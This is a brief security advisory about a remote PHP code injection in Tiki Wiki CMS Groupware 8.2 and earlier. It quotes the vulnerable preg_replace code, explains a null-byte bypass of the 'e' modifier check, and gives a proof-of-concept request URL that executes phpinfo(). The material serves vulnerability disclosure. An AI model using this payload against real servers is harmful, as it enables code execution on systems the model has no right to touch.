------------------------------------------------------------------------- 

 

Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection 

 

------------------------------------------------------------------------- 

作者: Egidio Romano aka EgiX  www.2cto.com n0b0d13s[at]gmail[dot]com 

 

软件地址: http://info.tiki.org/ 

[-]缺陷解释: 

 

 问题代码位置/lib/wiki-plugins/wikiplugin_snarf.php: 

 

  

 

170.   // If the user specified a more specialized regex 

 

171.   if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) { 

 

172.      $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf ); 

 

173.   } 

 

  

 

input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent 

 

execution of arbitrary PHP code using the  'e'  modifier in a call to preg_replace() at line 172. 

 

But  this  check  could  be  bypassed  with a  null byte injection,  requesting an URL like this: 

 

  

 

 http://www.2cto.com /tiki-8.2/snarf_ajax.php?url=1&regexres=phpinfo()&regex=//e%00/ 

 

  

 

Tiki internal filters remove  all null bytes  from user input,  but for some strange reason  this 

 

doesn't  happen within admin sessions. So, successful exploitation of this vulnerability requires 

 

an user account with  administration  rights and  'PluginSnarf'  to be enabled  (not by default).